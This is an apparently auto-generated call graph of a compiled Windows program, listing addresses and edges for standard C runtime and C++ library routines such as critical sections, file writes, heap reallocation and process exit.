16760->16758 16762 42213a ___vcrt_InitializeCriticalSectionEx 5 API calls 16761->16762 16763 422049 16762->16763 16764 422061 TlsGetValue 16763->16764 16765 419a51 16763->16765 16764->16765 16765->16734 16765->16735 16765->16736 16767 41ac67 _free 14 API calls 16766->16767 16768 415bfe 16767->16768 16768->16734 16770 413306 16769->16770 16778 413317 16769->16778 16780 41320d GetModuleHandleW 16770->16780 16775 4131c5 16775->16148 16787 413436 16778->16787 16781 413219 16780->16781 16781->16778 16782 413250 GetModuleHandleExW 16781->16782 16783 41326f GetProcAddress 16782->16783 16786 413284 16782->16786 16783->16786 16784 4132a1 16784->16778 16785 413298 FreeLibrary 16785->16784 16786->16784 16786->16785 16788 413442 ___scrt_is_nonwritable_in_current_image 16787->16788 16803 415904 EnterCriticalSection 16788->16803 16790 41344c 16804 41335c 16790->16804 16792 413459 16808 413477 16792->16808 16795 4132a3 16832 41dcb5 GetPEB 16795->16832 16798 4132d2 16801 413250 CallUnexpected 3 API calls 16798->16801 16799 4132b2 GetPEB 16799->16798 16800 4132c2 GetCurrentProcess TerminateProcess 16799->16800 16800->16798 16802 4132da ExitProcess 16801->16802 16803->16790 16805 413368 ___scrt_is_nonwritable_in_current_image 16804->16805 16806 4133c9 CallUnexpected 16805->16806 16811 41501b 16805->16811 16806->16792 16831 41591b LeaveCriticalSection 16808->16831 16810 41334b 16810->16775 16810->16795 16814 4152bc 16811->16814 16815 4152c8 ___scrt_is_nonwritable_in_current_image 16814->16815 16822 415904 EnterCriticalSection 16815->16822 16817 4152d6 16823 415187 16817->16823 16822->16817 16824 41519e 16823->16824 16825 4151a6 16823->16825 16827 41530b 16824->16827 16825->16824 16826 41ac67 _free 14 API calls 16825->16826 16826->16824 16830 41591b LeaveCriticalSection 16827->16830 16829 415046 16829->16806 16830->16829 16831->16810 16833 41dccf 16832->16833 16834 4132ad 16832->16834 16836 41b96c 16833->16836 16834->16798 16834->16799 16837 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 16836->16837 16838 41b988 16837->16838 16838->16834 16840 413046 16839->16840 16841 413058 ___scrt_uninitialize_crt 16839->16841 16842 413054 16840->16842 16844 41d094 16840->16844 16841->16189 16842->16189 16847 41d1a2 16844->16847 16850 41d27b 16847->16850 16851 41d287 ___scrt_is_nonwritable_in_current_image 16850->16851 16858 415904 EnterCriticalSection 16851->16858 16853 41d291 ___scrt_uninitialize_crt 16854 41d2fd 16853->16854 16859 41d1ef 16853->16859 16867 41d31b 16854->16867 16858->16853 16860 41d1fb ___scrt_is_nonwritable_in_current_image 16859->16860 16870 41d327 EnterCriticalSection 16860->16870 16862 41d23e 16881 41d26f 16862->16881 16863 41d205 ___scrt_uninitialize_crt 16863->16862 16871 41d09d 16863->16871 17014 41591b LeaveCriticalSection 16867->17014 16869 41d09b 16869->16842 16870->16863 16872 41d0b3 16871->16872 16873 41d0aa 16871->16873 16884 41d0e5 16872->16884 16875 41d1a2 ___scrt_uninitialize_crt 77 API calls 16873->16875 16877 41d0b0 16875->16877 16877->16862 16879 41d0cf 16897 42259d 16879->16897 17013 41d33b LeaveCriticalSection 16881->17013 16883 41d25d 16883->16853 16885 41d0fd 16884->16885 16886 41d0b9 16884->16886 16885->16886 16887 41dbf8 ___scrt_uninitialize_crt 27 API calls 16885->16887 16886->16877 16890 41dbf8 16886->16890 16888 41d11b 16887->16888 16908 4226bc 16888->16908 16891 41dc04 16890->16891 16892 41dc19 16890->16892 16893 415317 __dosmaperr 14 API calls 16891->16893 16892->16879 16894 41dc09 16893->16894 16895 415685 ___std_exception_copy 27 API calls 16894->16895 16896 41dc14 16895->16896 16896->16879 16898 4225bb 16897->16898 16899 4225ae 16897->16899 16901 422604 16898->16901 16903 4225e2 16898->16903 16900 415317 __dosmaperr 14 API calls 16899->16900 16907 4225b3 16900->16907 16902 415317 __dosmaperr 14 API calls 16901->16902 16904 422609 16902->16904 16982 42261a 16903->16982 16906 415685 ___std_exception_copy 27 API calls 16904->16906 16906->16907 16907->16877 16909 4226c8 ___scrt_is_nonwritable_in_current_image 16908->16909 16910 4226d0 16909->16910 16911 4226e8 16909->16911 16933 41532a 16910->16933 16913 422783 16911->16913 16918 42271a 16911->16918 16915 41532a __dosmaperr 14 API calls 16913->16915 16917 422788 16915->16917 16916 415317 __dosmaperr 14 API calls 16919 4226dd 16916->16919 16920 415317 __dosmaperr 14 API calls 16917->16920 16936 420dcd EnterCriticalSection 16918->16936 16919->16886 16922 422790 16920->16922 16924 415685 ___std_exception_copy 27 API calls 16922->16924 16923 422720 16925 422751 16923->16925 16926 42273c 16923->16926 16924->16919 16937 4227ae 16925->16937 16927 415317 __dosmaperr 14 API calls 16926->16927 16929 422741 16927->16929 16930 41532a __dosmaperr 14 API calls 16929->16930 16931 42274c 16930->16931 16979 42277b 16931->16979 16934 41afbf __dosmaperr 14 API calls 16933->16934 16935 41532f 16934->16935 16935->16916 16936->16923 16938 4227d0 16937->16938 16975 4227ec 16937->16975 16939 4227d4 16938->16939 16941 422824 16938->16941 16940 41532a __dosmaperr 14 API calls 16939->16940 16942 4227d9 16940->16942 16944 42283a 16941->16944 16946 4240dc ___scrt_uninitialize_crt 29 API calls 16941->16946 16943 415317 __dosmaperr 14 API calls 16942->16943 16945 4227e1 16943->16945 16947 422988 ___scrt_uninitialize_crt 49 API calls 16944->16947 16948 415685 ___std_exception_copy 27 API calls 16945->16948 16946->16944 16949 422843 16947->16949 16948->16975 16950 422881 16949->16950 16951 422848 16949->16951 16954 422895 16950->16954 16955 4228db WriteFile 16950->16955 16952 42286e 16951->16952 16953 42284c 16951->16953 16956 4229f9 ___scrt_uninitialize_crt 54 API calls 16952->16956 16960 422da5 ___scrt_uninitialize_crt 6 API calls 16953->16960 16968 422948 16953->16968 16958 4228cb 16954->16958 16959 42289d 16954->16959 16957 4228fe GetLastError 16955->16957 16965 422864 16955->16965 16956->16965 16957->16965 16961 422e0d ___scrt_uninitialize_crt 7 API calls 16958->16961 16962 4228a2 16959->16962 16963 4228bb 16959->16963 16960->16965 16961->16965 16962->16968 16970 422ee8 ___scrt_uninitialize_crt 7 API calls 16962->16970 16964 422fd1 ___scrt_uninitialize_crt 8 API calls 16963->16964 16964->16965 16965->16968 16969 42291e 16965->16969 16965->16975 16966 415317 __dosmaperr 14 API calls 16967 422969 16966->16967 16971 41532a __dosmaperr 14 API calls 16967->16971 16968->16966 16968->16975 16972 422925 16969->16972 16973 42293c 16969->16973 16970->16965 16971->16975 16976 415317 __dosmaperr 14 API calls 16972->16976 16974 41533d __dosmaperr 14 API calls 16973->16974 16974->16975 16975->16931 16977 42292a 16976->16977 16978 41532a __dosmaperr 14 API calls 16977->16978 16978->16975 16980 420df0 ___scrt_uninitialize_crt LeaveCriticalSection 16979->16980 16981 422781 16980->16981 16981->16919 16983 422626 ___scrt_is_nonwritable_in_current_image 16982->16983 16996 420dcd EnterCriticalSection 16983->16996 16985 422635 16986 42267c 16985->16986 16997 420b84 16985->16997 16987 415317 __dosmaperr 14 API calls 16986->16987 16989 422681 16987->16989 17010 4226b0 16989->17010 16990 422661 FlushFileBuffers 16990->16989 16991 42266d 16990->16991 16993 41532a __dosmaperr 14 API calls 16991->16993 16994 422672 GetLastError 16993->16994 16994->16986 16996->16985 16998 420b91 16997->16998 17001 420ba6 16997->17001 16999 41532a __dosmaperr 14 API calls 16998->16999 17000 420b96 16999->17000 17004 415317 __dosmaperr 14 API calls 17000->17004 17002 41532a __dosmaperr 14 API calls 17001->17002 17005 420bcb 17001->17005 17003 420bd6 17002->17003 17006 415317 __dosmaperr 14 API calls 17003->17006 17007 420b9e 17004->17007 17005->16990 17008 420bde 17006->17008 17007->16990 17009 415685 ___std_exception_copy 27 API calls 17008->17009 17009->17007 17011 420df0 ___scrt_uninitialize_crt LeaveCriticalSection 17010->17011 17012 422699 17011->17012 17012->16907 17013->16883 17014->16869 17786 408a60 17789 4087c0 17786->17789 17788 408aec 17790 4087f5 17789->17790 17795 409050 17790->17795 17792 408834 std::ios_base::_Ios_base_dtor 17794 408850 17792->17794 17808 40f06b 17792->17808 17794->17788 17816 4098a0 17795->17816 17797 409074 17829 404020 17797->17829 17800 4090da 17842 409ac0 17800->17842 17801 40947e 17804 4094ae 17801->17804 17846 407340 17801->17846 17850 401390 17804->17850 17805 40984c 17806 401390 27 API calls 17805->17806 17807 409854 17806->17807 17807->17792 17810 40f07d 17808->17810 17812 40f09b 17810->17812 18263 415d30 17810->18263 17813 40f15b 17812->17813 17815 40f160 17812->17815 18272 4196f0 17812->18272 17814 415317 __dosmaperr 14 API calls 17813->17814 17813->17815 17814->17815 17815->17794 17853 40e442 17816->17853 17820 4098d0 17828 4098fb 17820->17828 17865 409b70 17820->17865 17823 409989 17823->17797 17825 409929 17879 40e626 17825->17879 17882 40e473 17828->17882 17830 40e442 std::_Lockit::_Lockit 7 API calls 17829->17830 17831 40403a 17830->17831 17832 4041c0 9 API calls 17831->17832 17833 404050 17832->17833 17834 40407b 17833->17834 18192 4042d0 17833->18192 17835 40e473 std::_Lockit::~_Lockit 2 API calls 17834->17835 17837 404106 17835->17837 17837->17800 17839 404350 RaiseException 17840 4040a6 17839->17840 17841 40e626 std::_Facet_Register 16 API calls 17840->17841 17841->17834 17843 409ae2 17842->17843 18242 40a2e0 17843->18242 17845 409afb 17845->17801 17847 407364 17846->17847 17848 4073b6 17846->17848 17847->17801 18248 4073e0 17848->18248 18259 40df80 17850->18259 17852 4013a4 17852->17805 17854 40e451 17853->17854 17855 40e458 17853->17855 17889 415932 17854->17889 17857 4098ba 17855->17857 17894 40f8eb EnterCriticalSection 17855->17894 17859 4041c0 17857->17859 17860 404214 17859->17860 17861 4041d8 17859->17861 17860->17820 17862 40e442 std::_Lockit::_Lockit 7 API calls 17861->17862 17863 4041e9 17862->17863 17864 40e473 std::_Lockit::~_Lockit 2 API calls 17863->17864 17864->17860 17866 409b86 17865->17866 17867 409918 17865->17867 17866->17867 17946 40e0c8 17866->17946 17867->17825 17875 404350 17867->17875 17869 409b9e 17958 404480 17869->17958 17876 40435e 17875->17876 17877 410337 CallUnexpected RaiseException 17876->17877 17878 404373 17877->17878 17880 40e0c8 std::_Facet_Register 16 API calls 17879->17880 17881 40e631 17880->17881 17881->17828 17883 415940 17882->17883 17884 40e47d 17882->17884 18191 41591b LeaveCriticalSection 17883->18191 17885 40e490 17884->17885 18190 40f8f9 LeaveCriticalSection 17884->18190 17885->17823 17888 415947 17888->17823 17895 41b9b7 17889->17895 17893 41593e 17893->17857 17894->17857 17919 41bb38 17895->17919 17912 41bc08 std::_Locinfo::_Locinfo_dtor 5 API calls 17913 41b9e4 17912->17913 17943 41bc22 17913->17943 17916 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17917 415937 17916->17917 17918 415904 EnterCriticalSection 17917->17918 17918->17893 17920 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17919->17920 17921 41b9bc 17920->17921 17922 41bb52 17921->17922 17923 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17922->17923 17924 41b9c1 17923->17924 17925 41bb6c 17924->17925 17926 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17925->17926 17927 41b9c6 17926->17927 17928 41bb86 17927->17928 17929 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17928->17929 17930 41b9cb 17929->17930 17931 41bba0 17930->17931 17932 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17931->17932 17933 41b9d0 17932->17933 17934 41bbba 17933->17934 17935 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17934->17935 17936 41b9d5 17935->17936 17937 41bbd4 17936->17937 17938 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17937->17938 17939 41b9da 17938->17939 17940 41bbee 17939->17940 17941 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17940->17941 17942 41b9df 17941->17942 17942->17912 17944 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17943->17944 17945 41b9e9 17944->17945 17945->17916 17949 40e0cd 17946->17949 17947 415ddc ___std_exception_copy 15 API calls 17947->17949 17948 40e0e7 17948->17869 17949->17947 17949->17948 17950 413483 std::_Facet_Register 2 API calls 17949->17950 17951 40e0e9 17949->17951 17950->17949 17952 40f479 std::_Facet_Register 17951->17952 17954 40e0f3 Concurrency::cancel_current_task 17951->17954 17953 410337 CallUnexpected RaiseException 17952->17953 17955 40f495 17953->17955 17956 410337 CallUnexpected RaiseException 17954->17956 17957 40e9fd 17956->17957 17959 40e442 std::_Lockit::_Lockit 7 API calls 17958->17959 17960 4044a0 17959->17960 17961 40450b 17960->17961 17962 4044ef 17960->17962 17997 40ea3e 17961->17997 17988 40e6aa 17962->17988 17967 409c00 17968 409c28 17967->17968 18126 409c60 17968->18126 17971 404570 18179 40e6f5 17971->18179 17976 404ba0 14 API calls 17977 40459d 17976->17977 17978 404ba0 14 API calls 17977->17978 17979 4045a8 17978->17979 17980 404ba0 14 API calls 17979->17980 17981 4045b3 17980->17981 17982 404ba0 14 API calls 17981->17982 17983 4045be 17982->17983 17984 404ba0 14 API calls 17983->17984 17985 4045c9 17984->17985 17986 40e473 std::_Lockit::~_Lockit 2 API calls 17985->17986 17987 4045d1 17986->17987 17987->17867 18004 415de7 17988->18004 17992 40e6ce 17993 40e6de 17992->17993 17994 415de7 std::_Locinfo::_Locinfo_dtor 73 API calls 17992->17994 17995 40e70f _Yarn 15 API calls 17993->17995 17994->17993 17996 404501 17995->17996 17996->17967 18123 40eb2b 17997->18123 18000 410337 CallUnexpected RaiseException 18001 40ea5d 18000->18001 18002 401a30 std::bad_exception::bad_exception 28 API calls 18001->18002 18003 404519 18002->18003 18005 41b9b7 std::_Locinfo::_Locinfo_dtor 5 API calls 18004->18005 18006 415df4 18005->18006 18015 416019 18006->18015 18009 40e70f 18010 40e71d 18009->18010 18014 40e748 _Yarn 18009->18014 18011 40e729 18010->18011 18012 415be6 ___std_exception_destroy 14 API calls 18010->18012 18013 415ddc ___std_exception_copy 15 API calls 18011->18013 18011->18014 18012->18011 18013->18014 18014->17992 18016 416025 ___scrt_is_nonwritable_in_current_image 18015->18016 18023 415904 EnterCriticalSection 18016->18023 18018 416033 18024 415eba 18018->18024 18020 416040 18052 416068 18020->18052 18023->18018 18055 415e1f 18024->18055 18026 415ed5 18027 415f20 18026->18027 18028 41ae68 __Getctype 48 API calls 18026->18028 18027->18020 18029 415ee2 18028->18029 18102 421b56 18029->18102 18032 415f0e 18032->18027 18034 4156b2 __Getctype 11 API calls 18032->18034 18033 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18035 415f33 18033->18035 18038 416018 ___scrt_is_nonwritable_in_current_image 18034->18038 18035->18027 18036 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18035->18036 18037 415f4f 18036->18037 18039 415f71 18037->18039 18040 415f56 18037->18040 18121 415904 EnterCriticalSection 18038->18121 18046 41ac67 _free 14 API calls 18039->18046 18048 415f9c 18039->18048 18040->18032 18043 415f68 18040->18043 18042 416033 18044 415eba std::_Locinfo::_Locinfo_dtor 73 API calls 18042->18044 18045 41ac67 _free 14 API calls 18043->18045 18047 416040 18044->18047 18045->18027 18046->18048 18049 416068 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 18047->18049 18048->18027 18050 41ac67 _free 14 API calls 18048->18050 18051 416051 18049->18051 18050->18027 18051->18020 18122 41591b LeaveCriticalSection 18052->18122 18054 40e6b6 18054->18009 18056 415e39 18055->18056 18057 415e2b 18055->18057 18059 4218b3 __cftoe 50 API calls 18056->18059 18058 4135e8 std::_Locinfo::_Locinfo_dtor 69 API calls 18057->18058 18060 415e35 18058->18060 18061 415e50 18059->18061 18060->18026 18062 415eaf 18061->18062 18063 41bd43 __Getctype 14 API calls 18061->18063 18064 4156b2 __Getctype 11 API calls 18062->18064 18065 415e6b 18063->18065 18066 415eb9 18064->18066 18068 4218b3 __cftoe 50 API calls 18065->18068 18076 415e93 18065->18076 18070 415e1f std::_Locinfo::_Locinfo_dtor 73 API calls 18066->18070 18067 41ac67 _free 14 API calls 18069 415ea8 18067->18069 18071 415e82 18068->18071 18069->18026 18072 415ed5 18070->18072 18073 415e95 18071->18073 18074 415e89 18071->18074 18077 41ae68 __Getctype 48 API calls 18072->18077 18101 415f20 18072->18101 18075 4135e8 std::_Locinfo::_Locinfo_dtor 69 API calls 18073->18075 18074->18062 18074->18076 18075->18076 18076->18067 18078 415ee2 18077->18078 18079 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18078->18079 18080 415f07 18079->18080 18081 415f0e 18080->18081 18082 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18080->18082 18083 4156b2 __Getctype 11 API calls 18081->18083 18081->18101 18084 415f33 18082->18084 18087 416018 ___scrt_is_nonwritable_in_current_image 18083->18087 18085 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18084->18085 18084->18101 18086 415f4f 18085->18086 18088 415f71 18086->18088 18089 415f56 18086->18089 18090 415904 std::_Lockit::_Lockit EnterCriticalSection 18087->18090 18095 41ac67 _free 14 API calls 18088->18095 18097 415f9c 18088->18097 18089->18081 18092 415f68 18089->18092 18091 416033 18090->18091 18093 415eba std::_Locinfo::_Locinfo_dtor 73 API calls 18091->18093 18094 41ac67 _free 14 API calls 18092->18094 18096 416040 18093->18096 18094->18101 18095->18097 18098 416068 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 18096->18098 18099 41ac67 _free 14 API calls 18097->18099 18097->18101 18100 416051 18098->18100 18099->18101 18100->18026 18101->18026 18103 421b6d 18102->18103 18104 421b9f 18103->18104 18108 421b71 18103->18108 18105 415317 __dosmaperr 14 API calls 18104->18105 18106 421ba4 18105->18106 18107 415685 ___std_exception_copy 27 API calls 18106->18107 18117 415f07 18107->18117 18109 421bb2 18108->18109 18110 421b92 18108->18110 18112 421c1d std::_Locinfo::_Locinfo_dtor 50 API calls 18109->18112 18111 415317 __dosmaperr 14 API calls 18110->18111 18113 421b97 18111->18113 18114 421bbf 18112->18114 18116 415685 ___std_exception_copy 27 API calls 18113->18116 18115 421bc7 18114->18115 18119 421bd7 18114->18119 18118 415317 __dosmaperr 14 API calls 18115->18118 18116->18117 18117->18032 18117->18033 18118->18117 18119->18117 18120 415317 __dosmaperr 14 API calls 18119->18120 18120->18113 18121->18042 18122->18054 18124 403fa0 std::invalid_argument::invalid_argument 28 API calls 18123->18124 18125 40ea4f 18124->18125 18125->18000 18141 409f70 18126->18141 18131 409f90 48 API calls 18132 409cc8 18131->18132 18147 409fc0 18132->18147 18134 409d11 18135 409fc0 RaiseException 18134->18135 18136 409d3f 18135->18136 18137 409fc0 RaiseException 18136->18137 18138 409d6d _Yarn 18137->18138 18151 40a130 18138->18151 18155 415db4 18141->18155 18144 409f90 18160 40ecc6 18144->18160 18148 409fdb __Getctype _strlen 18147->18148 18149 40a006 18148->18149 18175 40e9e1 18148->18175 18149->18134 18152 409bd7 18151->18152 18153 40a148 18151->18153 18152->17971 18154 40a160 14 API calls 18153->18154 18154->18152 18156 41ae68 __Getctype 48 API calls 18155->18156 18157 415dbf 18156->18157 18158 41b3b2 __Getctype 48 API calls 18157->18158 18159 409c88 18158->18159 18159->18144 18161 40ecd9 std::bad_exception::bad_exception 18160->18161 18162 412f37 __Getctype 48 API calls 18161->18162 18163 40ece1 18162->18163 18170 412a8d 18163->18170 18166 412f10 __Getctype 48 API calls 18167 40ecf0 18166->18167 18168 4130be __Getctype 48 API calls 18167->18168 18169 409c99 18167->18169 18168->18169 18169->18131 18171 41ae68 __Getctype 48 API calls 18170->18171 18172 412a98 18171->18172 18173 41b3b2 __Getctype 48 API calls 18172->18173 18174 40ece8 18173->18174 18174->18166 18176 40e9ef Concurrency::cancel_current_task 18175->18176 18177 410337 CallUnexpected RaiseException 18176->18177 18178 40e9fd 18177->18178 18180 40e701 18179->18180 18181 404587 18179->18181 18182 415de7 std::_Locinfo::_Locinfo_dtor 73 API calls 18180->18182 18183 404ba0 18181->18183 18182->18181 18186 404bc0 18183->18186 18187 404592 18186->18187 18188 404bd8 18186->18188 18187->17976 18189 415be6 ___std_exception_destroy 14 API calls 18188->18189 18189->18187 18190->17885 18191->17888 18193 404098 18192->18193 18194 4042e6 18192->18194 18193->17839 18193->17840 18194->18193 18195 40e0c8 std::_Facet_Register 16 API calls 18194->18195 18196 4042fe 18195->18196 18197 404480 76 API calls 18196->18197 18198 404314 18197->18198 18202 404520 18198->18202 18201 404570 74 API calls 18201->18193 18203 404540 18202->18203 18206 4046a0 18203->18206 18209 404ac0 18206->18209 18212 40ec5b 18209->18212 18213 412f37 __Getctype 48 API calls 18212->18213 18214 40ec64 __Getctype 18213->18214 18215 40ec9c 18214->18215 18216 40ec7e 18214->18216 18218 4130be __Getctype 48 API calls 18215->18218 18217 4130be __Getctype 48 API calls 18216->18217 18219 40ec85 18217->18219 18218->18219 18220 412f10 __Getctype 48 API calls 18219->18220 18221 40ecad 18220->18221 18222 40432f 18221->18222 18224 415b29 18221->18224 18222->18201 18225 415b71 18224->18225 18226 415b36 18224->18226 18225->18222 18227 415ddc ___std_exception_copy 15 API calls 18226->18227 18228 415b59 18227->18228 18228->18225 18233 41b40c 18228->18233 18231 4156b2 __Getctype 11 API calls 18232 415b87 18231->18232 18234 41b419 18233->18234 18235 41b427 18233->18235 18234->18235 18240 41b440 18234->18240 18236 415317 __dosmaperr 14 API calls 18235->18236 18237 41b431 18236->18237 18238 415685 ___std_exception_copy 27 API calls 18237->18238 18239 415b6a 18238->18239 18239->18225 18239->18231 18240->18239 18241 415317 __dosmaperr 14 API calls 18240->18241 18241->18237 18243 40a303 18242->18243 18244 403040 29 API calls 18243->18244 18245 40a315 18243->18245 18244->18245 18246 403100 29 API calls 18245->18246 18247 40a34e 18245->18247 18246->18247 18247->17845 18249 40740e 18248->18249 18250 403040 29 API calls 18249->18250 18251 40741f 18249->18251 18250->18251 18252 403100 29 API calls 18251->18252 18254 407461 18252->18254 18253 40752d 18253->17847 18254->18253 18256 403c00 18254->18256 18257 403c30 27 API calls 18256->18257 18258 403c24 18257->18258 18258->18253 18261 40df9a 18259->18261 18260 40dfaa 18260->17852 18261->18260 18262 403c00 27 API calls 18261->18262 18262->18260 18264 415d61 18263->18264 18269 415d47 18263->18269 18265 41ae68 __Getctype 48 API calls 18264->18265 18266 415d66 18265->18266 18267 41b3b2 __Getctype 48 API calls 18266->18267 18268 415d76 18267->18268 18268->18269 18270 42177f 51 API calls 18268->18270 18269->17810 18271 415da3 18270->18271 18271->17810 18273 4196fe 18272->18273 18275 419708 18272->18275 18276 419720 18273->18276 18275->17812 18277 419737 18276->18277 18285 41974c 18276->18285 18278 4129fa __fassign 48 API calls 18277->18278 18279 419743 18278->18279 18280 419798 18279->18280 18279->18285 18286 421f7f 18279->18286 18282 415317 __dosmaperr 14 API calls 18280->18282 18283 41979e 18280->18283 18282->18283 18284 41c132 52 API calls 18283->18284 18284->18285 18285->18275 18287 4129fa __fassign 48 API calls 18286->18287 18288 421f92 __fassign 18287->18288 18288->18280 18344 41b074 18345 41b08f 18344->18345 18346 41b07f 18344->18346 18350 41b179 18346->18350 18349 41ac67 _free 14 API calls 18349->18345 18351 41b194 18350->18351 18352 41b18e 18350->18352 18354 41ac67 _free 14 API calls 18351->18354 18353 41ac67 _free 14 API calls 18352->18353 18353->18351 18355 41b1a0 18354->18355 18356 41ac67 _free 14 API calls 18355->18356 18357 41b1ab 18356->18357 18358 41ac67 _free 14 API calls 18357->18358 18359 41b1b6 18358->18359 18360 41ac67 _free 14 API calls 18359->18360 18361 41b1c1 18360->18361 18362 41ac67 _free 14 API calls 18361->18362 18363 41b1cc 18362->18363 18364 41ac67 _free 14 API calls 18363->18364 18365 41b1d7 18364->18365 18366 41ac67 _free 14 API calls 18365->18366 18367 41b1e2 18366->18367 18368 41ac67 _free 14 API calls 18367->18368 18369 41b1ed 18368->18369 18370 41ac67 _free 14 API calls 18369->18370 18371 41b1fb 18370->18371 18376 41b2f2 18371->18376 18377 41b2fe ___scrt_is_nonwritable_in_current_image 18376->18377 18392 415904 EnterCriticalSection 18377->18392 18380 41b308 18382 41ac67 _free 14 API calls 18380->18382 18383 41b332 18380->18383 18382->18383 18393 41b351 18383->18393 18384 41b35d 18385 41b369 ___scrt_is_nonwritable_in_current_image 18384->18385 18397 415904 EnterCriticalSection 18385->18397 18387 41b373 18388 41b095 __Getctype 14 API calls 18387->18388 18389 41b386 18388->18389 18398 41b3a6 18389->18398 18392->18380 18396 41591b LeaveCriticalSection 18393->18396 18395 41b221 18395->18384 18396->18395 18397->18387 18401 41591b LeaveCriticalSection 18398->18401 18400 41b087 18400->18349 18401->18400 18412 40e078 18417 40e492 18412->18417 18418 40e4a2 18417->18418 18419 40e082 18417->18419 18418->18419 18424 40f8c8 InitializeCriticalSectionEx 18418->18424 18421 40e1f1 18419->18421 18425 40e206 18421->18425 18424->18418 18426 40e215 18425->18426 18427 40e21c 18425->18427 18431 415048 18426->18431 18434 414fe8 18427->18434 18430 40e08c 18432 414fe8 30 API calls 18431->18432 18433 41505a 18432->18433 18433->18430 18437 415261 18434->18437 18438 41526d ___scrt_is_nonwritable_in_current_image 18437->18438 18445 415904 EnterCriticalSection 18438->18445 18440 41527b 18446 41505e 18440->18446 18442 415288 18456 4152b0 18442->18456 18445->18440 18447 41507a 18446->18447 18449 4150f1 std::_Locinfo::_Locinfo_dtor 18446->18449 18448 4150d1 18447->18448 18447->18449 18459 420a90 18447->18459 18448->18449 18450 420a90 30 API calls 18448->18450 18449->18442 18452 4150e7 18450->18452 18454 41ac67 _free 14 API calls 18452->18454 18453 4150c7 18455 41ac67 _free 14 API calls 18453->18455 18454->18449 18455->18448 18487 41591b LeaveCriticalSection 18456->18487 18458 415019 18458->18430 18460 420ab8 18459->18460 18461 420a9d 18459->18461 18463 420ac7 18460->18463 18468 423d30 18460->18468 18461->18460 18462 420aa9 18461->18462 18464 415317 __dosmaperr 14 API calls 18462->18464 18475 42184a 18463->18475 18467 420aae std::bad_exception::bad_exception 18464->18467 18467->18453 18469 423d50 HeapSize 18468->18469 18470 423d3b 18468->18470 18469->18463 18471 415317 __dosmaperr 14 API calls 18470->18471 18472 423d40 18471->18472 18473 415685 ___std_exception_copy 27 API calls 18472->18473 18474 423d4b 18473->18474 18474->18463 18476 421862 18475->18476 18477 421857 18475->18477 18479 42186a 18476->18479 18485 421873 __Getctype 18476->18485 18478 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18477->18478 18484 42185f 18478->18484 18482 41ac67 _free 14 API calls 18479->18482 18480 421878 18483 415317 __dosmaperr 14 API calls 18480->18483 18481 42189d HeapReAlloc 18481->18484 18481->18485 18482->18484 18483->18484 18484->18467 18485->18480 18485->18481 18486 413483 std::_Facet_Register 2 API calls 18485->18486 18486->18485 18487->18458 18654 41d417 18655 41d094 ___scrt_uninitialize_crt 77 API calls 18654->18655 18656 41d41f 18655->18656 18664 423103 18656->18664 18658 41d424 18674 4231ae 18658->18674 18661 41d44e 18662 41ac67 _free 14 API calls 18661->18662 18663 41d459 18662->18663 18665 42310f ___scrt_is_nonwritable_in_current_image 18664->18665 18678 415904 EnterCriticalSection 18665->18678 18667 423186 18692 4231a5 18667->18692 18669 42315a DeleteCriticalSection 18672 41ac67 _free 14 API calls 18669->18672 18673 42311a 18672->18673 18673->18667 18673->18669 18679 4241a5 18673->18679 18675 4231c5 18674->18675 18676 41d433 DeleteCriticalSection 18674->18676 18675->18676 18677 41ac67 _free 14 API calls 18675->18677 18676->18658 18676->18661 18677->18676 18678->18673 18680 4241b1 ___scrt_is_nonwritable_in_current_image 18679->18680 18681 4241d0 18680->18681 18682 4241bb 18680->18682 18691 4241cb 18681->18691 18695 41d327 EnterCriticalSection 18681->18695 18683 415317 __dosmaperr 14 API calls 18682->18683 18685 4241c0 18683->18685 18687 415685 ___std_exception_copy 27 API calls 18685->18687 18686 4241ed 18696 424229 18686->18696 18687->18691 18689 4241f8 18712 42421f 18689->18712 18691->18673 18776 41591b LeaveCriticalSection 18692->18776 18694 423192 18694->18658 18695->18686 18697 424236 18696->18697 18698 42424b 18696->18698 18699 415317 __dosmaperr 14 API calls 18697->18699 18700 41d0e5 ___scrt_uninitialize_crt 73 API calls 18698->18700 18704 424246 18698->18704 18701 42423b 18699->18701 18702 424260 18700->18702 18703 415685 ___std_exception_copy 27 API calls 18701->18703 18705 4231ae 14 API calls 18702->18705 18703->18704 18704->18689 18706 424268 18705->18706 18707 41dbf8 ___scrt_uninitialize_crt 27 API calls 18706->18707 18708 42426e 18707->18708 18715 4247c1 18708->18715 18711 41ac67 _free 14 API calls 18711->18704 18775 41d33b LeaveCriticalSection 18712->18775 18714 424227 18714->18691 18716 4247d2 18715->18716 18717 4247e7 18715->18717 18719 41532a __dosmaperr 14 API calls 18716->18719 18718 424830 18717->18718 18722 42480e 18717->18722 18720 41532a __dosmaperr 14 API calls 18718->18720 18721 4247d7 18719->18721 18723 424835 18720->18723 18724 415317 __dosmaperr 14 API calls 18721->18724 18730 4248ea 18722->18730 18726 415317 __dosmaperr 14 API calls 18723->18726 18728 424274 18724->18728 18727 42483d 18726->18727 18729 415685 ___std_exception_copy 27 API calls 18727->18729 18728->18704 18728->18711 18729->18728 18731 4248f6 ___scrt_is_nonwritable_in_current_image 18730->18731 18741 420dcd EnterCriticalSection 18731->18741 18733 424904 18734 424936 18733->18734 18735 42492b 18733->18735 18737 415317 __dosmaperr 14 API calls 18734->18737 18742 42484e 18735->18742 18738 424931 18737->18738 18757 42496a 18738->18757 18741->18733 18743 420b84 ___scrt_uninitialize_crt 27 API calls 18742->18743 18746 42485e 18743->18746 18744 424864 18760 420bee 18744->18760 